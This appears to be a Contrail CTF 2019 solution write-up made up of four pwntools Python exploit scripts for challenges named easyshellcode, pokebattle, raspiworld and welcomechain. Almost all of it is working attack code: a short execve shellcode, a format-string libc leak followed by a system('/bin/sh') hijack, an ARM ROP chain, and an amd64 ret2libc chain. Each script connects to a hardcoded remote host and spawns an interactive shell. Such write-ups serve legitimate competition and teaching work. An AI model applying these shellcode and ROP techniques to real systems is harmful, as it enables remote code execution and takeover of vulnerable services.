Contrail CTF 2019 (pokebattle, welcomechain, EasyShellcode, RaspiWorld)

easyshellcode.py

# -*- coding: utf-8 -*-
from pwn import *
context.update(arch='amd64', os='linux')

host = '114.177.250.4'
port = 2210
s = remote(host, port)

shellcode = asm("""
mov rdi, [rax]
lea eax, [ebp + 0x3b]
add rdi, 13
syscall
""") + "/bin/sh"

print(disasm(shellcode))
print(len(shellcode))
assert len(shellcode) <= 0x14

s.send(shellcode)

s.interactive()

pokebattle.py

# -*- coding: utf-8 -*-
from pwn import *
context.update(arch='amd64', os='linux')

host = '114.177.250.4'
port = 2225
s = remote(host, port)

def pokeball(slot, name):
    s.recvuntil('> ')
    s.sendline('2')
    s.recvuntil('slot : ')
    s.sendline(str(slot))
    s.recvuntil('name : ')
    s.send(name)

def fight():
    s.recvuntil('> ')
    s.sendline('1')

# leak libc_base
printf_plt = 0x47b0 # 1/16
fmt_string = "%75$p\n\x00"
pokeball(0, fmt_string + 'A' * (40 - len(fmt_string)) + p16(printf_plt))
fight()

libc_start_main = int(s.recvline(), 16) - 231
libc_system = libc_start_main + (0x000000000004f440 - 0x0000000000021ab0)
print("libc_start_main: {}".format(hex(libc_start_main)))

# system("/bin/sh")
cmd = "/bin/sh\x00"
pokeball(0, cmd + 'A' * (40 - len(cmd)) + p64(libc_system))
fight()

s.interactive()

raspiworld.py

# -*- coding: utf-8 -*-
from pwn import *
context.binary = './0.elf'

host = '114.177.250.4'
port = 7777
s = remote(host, port)

_io_puts = 0x17148
vuln = 0x104cc

# r0 = "/bin/sh", r1 = NULL, r2 = NULL, r7=11

rop_chain = "A" * 0x40
rop_chain += "A" * 4 # dummy fp
# first ret addr
rop_chain += p32(0x1acc0) # 0x0001acc0 : pop {r4, r6, r7, pc}
# stack for 1acc0
rop_chain += "A" * 4 # r4
rop_chain += p32(0x5c46c) # 0x0005c46c : mov r0, r2 ; pop {r4, r5, r6, r7, r8, sb, sl, pc}
rop_chain += "A" * 4
rop_chain += p32(0x65d54) # 0x00065d54 : add r2, sp, #0x24 ; add r1, sp, #0x28 ; blx r6
# stack for 65d54
# nope
# stack for 0x5c46c
rop_chain += "A" * 4 # r4 
rop_chain += "A" * 4 # r5
rop_chain += "A" * 4 # r6
rop_chain += p32(11) # r7
rop_chain += "A" * 4 # r8
rop_chain += "A" * 4 # sb
rop_chain += "A" * 4 # sl
rop_chain += p32(0x10c18) #0x00010c18 : pop {r4, r5, r6, pc}
# stack for 0x10c18 (& r0)
rop_chain += "A" * 4 # r4
rop_chain += "/bin" # r5
rop_chain += "/sh\x00" # r6
rop_chain += p32(0x6d108) # 0x0006d108 : pop {r1, pc}
# stack for 6d108
rop_chain += p32(0x00)
rop_chain += p32(0x10160) # 0x00010160 : pop {r3, pc}
# stack for 10160
rop_chain += p32(0x6d078) # 0x0006d078 : pop {r2, r3} ; bx lr
rop_chain += p32(0x22e80) # 0x00022e80 : pop {lr} ; bx r3
# stack for 22e80
rop_chain += p32(0x1d8c8) # 0x0001d8c8 : svc #0 ; pop {r7} ; bx lr
#rop_chain += p32(vuln)
# stack for 6d078
rop_chain += p32(0x00)
rop_chain += p32(0x00)
# stack for 0x1d8c8
rop_chain += p32(0x00)

s.recvuntil("Welcome to Raspi World\n")
s.sendline(rop_chain)

s.interactive()

welcomechain.py

# -*- coding: utf-8 -*-
from pwn import *
context.update(arch='amd64', os='linux')

host = '114.177.250.4'
port = 2226
s = remote(host, port)

welcome_addr = 0x400740
puts_plt =  0x4005a0
printf_got = 0x601030
pop_rdi = 0x400853
ret = 0x00400576

# call puts to leak libc base
rop_chain = "A" * 0x28
rop_chain += p64(pop_rdi)
rop_chain += p64(printf_got)
rop_chain += p64(puts_plt)
rop_chain += p64(welcome_addr)

s.recvuntil(": ")
s.sendline(rop_chain)

s.recvline()
libc_printf = u64(s.recv(6) + '\x00\x00')
libc_base = libc_printf - 0x64e80
print("[+] got libc_base: {}".format(hex(libc_base)))

# system("/bin/sh")
libc_system = libc_base + 0x4f440
libc_puts = libc_base + 0x809c0 
libc_binsh = libc_base + 0x1b3e9a
rop_chain = "A" * 0x28
rop_chain += p64(pop_rdi)
rop_chain += p64(libc_binsh)
rop_chain += p64(ret)
rop_chain += p64(libc_system)

s.recvuntil(": ")
s.sendline(rop_chain)

s.interactive()